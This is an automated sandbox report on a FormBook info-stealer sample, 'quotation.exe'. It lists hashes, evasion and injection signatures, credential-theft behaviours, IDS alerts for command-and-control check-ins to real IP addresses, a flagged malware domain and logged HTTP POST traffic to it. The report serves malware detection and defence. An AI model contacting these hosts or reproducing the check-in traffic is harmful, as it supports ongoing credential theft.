Windows Analysis Report
quotation.exe

Overview

General Information

Sample name: quotation.exe
Analysis ID: 1567392
MD5: fb56fbfa78c904b961a8db42b7ac648d
SHA1: a4400e1e8e97fec1a68290b24aea4250189610ef
SHA256: c8135636799971efa2fe543c693f96ab2238d38b140d1da6a07727231161a765
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • quotation.exe (PID: 2364 cmdline: "C:\Users\user\Desktop\quotation.exe" MD5: FB56FBFA78C904B961A8DB42B7AC648D)
    • quotation.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\quotation.exe" MD5: FB56FBFA78C904B961A8DB42B7AC648D)
      • gkTgnrvdOG.exe (PID: 4228 cmdline: "C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 5416 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • gkTgnrvdOG.exe (PID: 3680 cmdline: "C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.quotation.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.quotation.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: http://www.5tuohbpzyj9.buzz/abgi/, Avira URL Cloud: Label: malware
                Source: http://www.5tuohbpzyj9.buzz/abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEj, Avira URL Cloud: Label: malware
                Source: quotation.exe, ReversingLabs: Detection: 39%
                Source: Yara match, File source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: quotation.exe, Joe Sandbox ML: detected
                Source: quotation.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: quotation.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gkTgnrvdOG.exe, 00000005.00000002.4519132239.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520216531.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: quotation.exe, quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 6_2_02A2C860 FindFirstFileW,FindNextFileW,FindClose (6_2_02A2C860)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 4x nop then xor eax, eax (6_2_02A19EA0)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 4x nop then mov ebx, 00000004h (6_2_035204E8)

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49754 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49817 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49798 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49856 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49843 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49805 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49837 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49850 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49811 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49879 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49874 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49916 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49890 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49903 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49910 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49923 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49945 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49952 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49958 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49885 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50025 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49939 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50029 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50017 -> 155.94.253.4:80
                Source: DNS query: www.acc888ommodate.xyz
                Source: Joe Sandbox View, IP Address: 209.74.77.107
                Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View, ASN Name: CAFENETTG
                Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown HTTP traffic detected: POST /abgi/ HTTP/1.1 Host: www.5tuohbpzyj9.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Origin: http://www.5tuohbpzyj9.buzz Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5tuohbpzyj9.buzz/abgi/ User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:14:26 GMT Content-Type: text/html Content-Length: 566 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuQ28zMlLhMf3STm%2FMgDZeBJc9XsH%2FfielDLeo4BCnHRgJVxGlnr%2BqzxCP2Im0gIxfNdYK2obgH4D2zlo1fy6cOervsCJjbNi0rPO84zwaYTJh%2FKVfBOS3PfngqJmzt2cCrhE1wwEEY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec3d2c369bf4267-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1780&rtt_var=890&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yifU1v40o8fTdV3Zs3b2P18PDLNEYrPvB1HG9X%2Bsh65KhXdIVf1JAMPakORvKENE31iZi%2F4WK7bRjF3mcAogXTNRFHMhLwlujyVMQ2fM6Be%2FYXl%2B9NPV%2BP5tR7hsh9JIa0%2Fi6DJbodg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec3d2d469414411-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1728&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HK5PlL1RGfY4E7sUlYpbS8mm%2F%2B5sbTATUBxuHpfZzg%2BdQ%2FpYwrZN94UrhpzbOxp%2FTeZ1BDKKUbBlqkz4GPn1fd7%2B06eOWk4oV6Zl1gE2HKRZlwkAIPSWFdtjhpIcFK4TiKFZoHwNNeg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec3d2e5495f17a9-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1628&rtt_var=814&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cz28Kz1C0Xnmh7a42Hr1UnohzWD%2F4VS7HIqhfRUUgycNlUyhoU27WE%2BTysB9dd02Ent4QYVg3guDvN4bVHerodzHsAVjZpAczdqmfZy7JR3gA3NeuRPYW25Q5bpT75ggWLz8Zo7vwdE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec3d2f60e1841bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:18 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:15:26 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:33 GMT Content-Type: text/html Content-Length: 146 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:36 GMT Content-Type: text/html Content-Length: 146 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:38 GMT Content-Type: text/html Content-Length: 146 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:41 GMT Content-Type: text/html Content-Length: 146 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:15:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 03 Dec 2024 13:16:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 1238; date: Tue, 03 Dec 2024 13:16:12 GMT; server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 796; date: Tue, 03 Dec 2024 13:16:19 GMT; server: LiteSpeed
